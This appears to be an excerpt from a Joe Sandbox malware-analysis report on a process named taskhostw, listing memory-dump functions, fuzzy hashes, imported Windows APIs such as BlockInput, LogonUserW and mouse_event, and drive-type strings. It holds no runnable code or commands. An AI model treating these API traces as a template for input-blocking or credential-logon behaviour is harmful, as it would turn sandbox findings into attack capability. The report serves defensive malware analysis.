
Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction ID: 6eeba043bd1a5acc1175ca24f67385b51942a80f9f81a8a285ce779e1db36a2d
Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction Fuzzy Hash: 8532F222D29F014DD7239634DD72336A299AFB72C8F15D737E819B5DA6EF28D4834208

Function 02A819AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction ID: b27f23c6a369269e906d96487ae9701df4446e7436d3ab53071f18d4af235b91
Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction Fuzzy Hash: 61B10231D2AF504DD723A6398835336BA5CAFBB2C5F51D72BFC2A70D22EB2185934181

Function 001E25AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8541860ab72cdf77548bc7a0531dfcf52e2b2e220a2e7128b5ab889c1488ef
Instruction ID: ce3a43d7b6c980650f2fcc0e758ea5ac573ca7dc34dddf34155d4fb0093e59e1
Opcode Fuzzy Hash: bd8541860ab72cdf77548bc7a0531dfcf52e2b2e220a2e7128b5ab889c1488ef
Instruction Fuzzy Hash: 67B10124E6AF404DD3239A399839336BA4CAFBB2C5F51D71BFC2674D22FB2185834141

Function 0022401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 0022403A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ef3697acd10ad49b11cf7d3e06496f8e558f2c8359622c315c38170e70c8d123
Instruction ID: e034f818553e80cbcf9bac76550bc2489f4d6b109b4c6550965bf3f4a4e13e01
Opcode Fuzzy Hash: ef3697acd10ad49b11cf7d3e06496f8e558f2c8359622c315c38170e70c8d123
Instruction Fuzzy Hash: DAE048322141146FC714AF5AE405A96FFDCAF74764F008056FD49DB351DB70E9418B90

Function 00214CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00214D1D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 50b5d90c9fa8631bf406e2eaf47ab0147409266408ee671b1823ae589fca49da
Instruction ID: 2898ae77fa4627413de6caef8f0271228694f56b61d3edeb19f6bff371e8393c
Opcode Fuzzy Hash: 50b5d90c9fa8631bf406e2eaf47ab0147409266408ee671b1823ae589fca49da
Instruction Fuzzy Hash: AED09EA417460679FC282F20BD2FBF61189F334B96FE84549760A971C5A8E868E1A435

Function 00208A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002086B1), ref: 00208A93

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 330b3ec29ab4db59679d6adab7e4e8e9b0898bb8e19c406d00e56175b4b011a0
Instruction ID: 7582131c3c3a1507c1ecc224b16a7d762987737c50d0b0e0820acd19080ca97e
Opcode Fuzzy Hash: 330b3ec29ab4db59679d6adab7e4e8e9b0898bb8e19c406d00e56175b4b011a0
Instruction Fuzzy Hash: E9D05E3226450EABEF018EA8ED05EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 001F215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 001F2171

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: cbba07f2e0c4954220ecf8c345fe76046b8ec38fd26587dd17fdd112a551d9b5
Instruction ID: 86f605170d6f7960613b14a4a171710d03554ce4319d96ad620b99a3a82b9e27
Opcode Fuzzy Hash: cbba07f2e0c4954220ecf8c345fe76046b8ec38fd26587dd17fdd112a551d9b5
Instruction Fuzzy Hash: B3C048F180110DEBCB09DBA0EA98DFEB7BCAB08304F2040A6A202F2100D7749B488B71

Function 001DA2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 001DA2AA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b88f6925919eac5725ab857ab69aa987b3aad5db0b72e76dcf2d75b91bea4516
Instruction ID: dffd27cc297857973eb14b6aa7e0f20ddbecdc73da8565a88616eb4a6d485fd1
Opcode Fuzzy Hash: b88f6925919eac5725ab857ab69aa987b3aad5db0b72e76dcf2d75b91bea4516
Instruction Fuzzy Hash: 74A0113000020CABCA002B82FC0888ABFACEA022A0B0080A0FC0C820228B32A8208A80

Function 001C8968 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5159475146703b0ff331103545ff725bcf9d4ebc69cda1cd0811d4df39d9a4ff
Instruction ID: a0d011546d7b931b495b3aefa2af0ad1026fb17417a172bff1ccc30908b4bc09
Opcode Fuzzy Hash: 5159475146703b0ff331103545ff725bcf9d4ebc69cda1cd0811d4df39d9a4ff
Instruction Fuzzy Hash: 5B221470910666CBCF388E28C4D4B7EB7A1FB21304F69806EE8569B5E2DB35DD91CB50

Function 02ACFCE2 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6448a3b11e8ff9466f0e578f329296174d29c08b5e91d5105d81ecfcb762292f
Instruction ID: e4f835e7c28fdf923fc978cccbfea4ef183bb77648e35a709033430cda3ff9ca
Opcode Fuzzy Hash: 6448a3b11e8ff9466f0e578f329296174d29c08b5e91d5105d81ecfcb762292f
Instruction Fuzzy Hash: E1024875640611AFCB14EF24C994A2AB7E6FF88324F04885DE98A9B361DF34ED44CF85

Function 02ACF865 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 10b0cfe4b2d6b9366fc7bd425921f3515bdb00e1dfbcfbc21c227227b9a2eb8f
Instruction ID: daa9bded8ff3e73e34e9a57c42d8b90604c4dd618acc88cd4ae5e529de20bdcb
Opcode Fuzzy Hash: 10b0cfe4b2d6b9366fc7bd425921f3515bdb00e1dfbcfbc21c227227b9a2eb8f
Instruction Fuzzy Hash: 2FE15C71204210AFCB14DF24C994E6BBBFAEF89714B14896EF84ADB261DB30E945CF51

Function 02A50687 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
Instruction ID: 94f6302cae6d9e4bee997e31a807b20352d315329e0531742eb9f1184f721eb8
Opcode Fuzzy Hash: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
Instruction Fuzzy Hash: E4A135B1164924BEE728AB288CD8E7F256EDB49308F14091BFC02D6182DF359D41CFB5

Function 02A71745 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 65e2cf0cbe367336f4d47a51825f2d42c4e00a971faac94c37e99848b6f399fd
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 53C1923220519309DF6D473A8CB513EBEE29E926B671A07ADD4BBCB5C5EF20C124D624

Function 001D2345 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 008f8b317fab536a7f816c377b90d150398f1ba2751390f511f552382333c4a0
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 34C183322151A31ADF2D4639843453EBEA15EB27B231A075FE8B3CB2D5EF20D568D620

Function 02A71B7A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: a0e1f98032ea780cdbe684e8c33d5642469314dd9df2145f307d92d564b53254
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: D0C1A53221519309DF6D473ACCB513EBFE29A926B631A07ADD4BBDB4C5EF20C124D624

Function 001D277A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: fa8f2b38caea799731dd789758d628f905bf1963115b5421f18fdc91a2ea7e18
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 9EC153322151A319DF6D463AC47413EBFA15FA27B231A176FE4B2DB2D5EF20C528D620

Function 02A71310 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: ff3aded019d64b84943776107a1ef9219f13c5b027d9fc170d420866c89ae439
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 60C194322051930ADF6D47398CB513EBEE29A926B671A07EDD4BBCB5C4EF20C164D624

Function 02A70EF8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: b6b5bcb36d6e22ed875514901b751ee6a10c67fa8fa8188df1a3c95ba1fddd06
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: F3C191322151930ADF6D47398CB513EFEE29A926B631A07EDD4B7DB5C4EF20C128D624

Function 0023A60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0023A662
GetSysColorBrush.USER32 ref: 0023A693
GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,001EBABA,?,?), ref: 0023A69F
SetBkColor.GDI32(?,000000FF), ref: 0023A6B9
SelectObject.GDI32(?,00000000), ref: 0023A6C8
InflateRect.USER32 ref: 0023A6F3
GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,001EBABA,?,?), ref: 0023A6FB
CreateSolidBrush.GDI32(00000000), ref: 0023A702
FrameRect.USER32 ref: 0023A711
DeleteObject.GDI32(00000000), ref: 0023A718
InflateRect.USER32 ref: 0023A763
FillRect.USER32 ref: 0023A795
GetWindowLongW.USER32(?,000000F0), ref: 0023A7C0

Part of subcall function 0023A8FC: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?), ref: 0023A935
Part of subcall function 0023A8FC: SetTextColor.GDI32(?,?), ref: 0023A939
Part of subcall function 0023A8FC: GetSysColorBrush.USER32 ref: 0023A94F
Part of subcall function 0023A8FC: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A95A
Part of subcall function 0023A8FC: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A977
Part of subcall function 0023A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0023A985
Part of subcall function 0023A8FC: SelectObject.GDI32(?,00000000), ref: 0023A996
Part of subcall function 0023A8FC: SetBkColor.GDI32(?,00000000), ref: 0023A99F
Part of subcall function 0023A8FC: SelectObject.GDI32(?,?), ref: 0023A9AC
Part of subcall function 0023A8FC: InflateRect.USER32 ref: 0023A9CB
Part of subcall function 0023A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0023A9E2
Part of subcall function 0023A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0023A9F7
Part of subcall function 0023A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0023AA1F

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 82c17da721ae39b0713f0510bfbb510ea774484db8dbeb5252c5a0d8c2175281
Instruction ID: 2ae3ab4c28e53a0c1ae592bb8bcd904bf112989b5ec6bb6bc66994ddcc480470
Opcode Fuzzy Hash: 82c17da721ae39b0713f0510bfbb510ea774484db8dbeb5252c5a0d8c2175281
Instruction Fuzzy Hash: ED916DB2818301BFCB509F64FD4CE5BBBA9FB88321F100A29F5A6961A1D771D944CF52

Function 001B2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 001B2CA2
DeleteObject.GDI32(00000000), ref: 001B2CE8
DeleteObject.GDI32(00000000), ref: 001B2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 001B2CFE
DestroyWindow.USER32 ref: 001B2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 001EC5BB
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001EC5F4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001ECA1D

Part of subcall function 001B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 001B1B9A

SendMessageW.USER32(?,00001053), ref: 001ECA5A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001ECA71
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001ECA87
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001ECA92

Strings

0, xrefs: 001EC8B1

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 6af4a827f902dc93227f5882e53689669e43e835dc3b871eaf5a3a50508f42e9
Instruction ID: 69dc89f9fd7caccd1d715c1f7a6262bffe2f9f103066fda65c0406dde21304f7
Opcode Fuzzy Hash: 6af4a827f902dc93227f5882e53689669e43e835dc3b871eaf5a3a50508f42e9
Instruction Fuzzy Hash: EF129C30600A41EFDB25CF25D989BAEBBE5FF49300F544569F895CB262C731E846CB91

Function 0021AD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0021ADAA
GetDriveTypeW.KERNEL32(?,0023FAC0,?,\\.\,0023F910), ref: 0021AE87
SetErrorMode.KERNEL32(00000000,0023FAC0,?,\\.\,0023F910), ref: 0021AFE5

Strings

\\.\, xrefs: 0021ADFC
RAMDisk, xrefs: 0021AEB1
SATA, xrefs: 0021AF98
PhysicalDrive, xrefs: 0021AE33
Fibre, xrefs: 0021AF75
ATA, xrefs: 0021AF60
Fixed, xrefs: 0021AECF
Network, xrefs: 0021AEC5
SAS, xrefs: 0021AF91
1394, xrefs: 0021AF67
Virtual, xrefs: 0021AFAD
SSD, xrefs: 0021AF12
Unknown, xrefs: 0021AEA7, 0021AF4B
RAID, xrefs: 0021AF83
MMC, xrefs: 0021AFA6
USB, xrefs: 0021AF7C
iSCSI, xrefs: 0021AF8A
ATAPI, xrefs: 0021AF59
SCSI, xrefs: 0021AF52
CDROM, xrefs: 0021AEBB
Removable, xrefs: 0021AED9
SSA, xrefs: 0021AF6E
FileBackedVirtual, xrefs: 0021AFB4

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a472efa55bee452043b5e2c093cd7e9a219731243ece6659df20942d1ec4bc32
Instruction ID: df42eafc93ecdcd4f116fa95610b22fb243baa7dabb3a0ba7d8d4044c728c546
Opcode Fuzzy Hash: a472efa55bee452043b5e2c093cd7e9a219731243ece6659df20942d1ec4bc32
Instruction Fuzzy Hash: 8251C4B46762059BCB20EF50C9828F9B3F1AB653047204166F906E7691CB72DDF2DB93

Function 001B6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

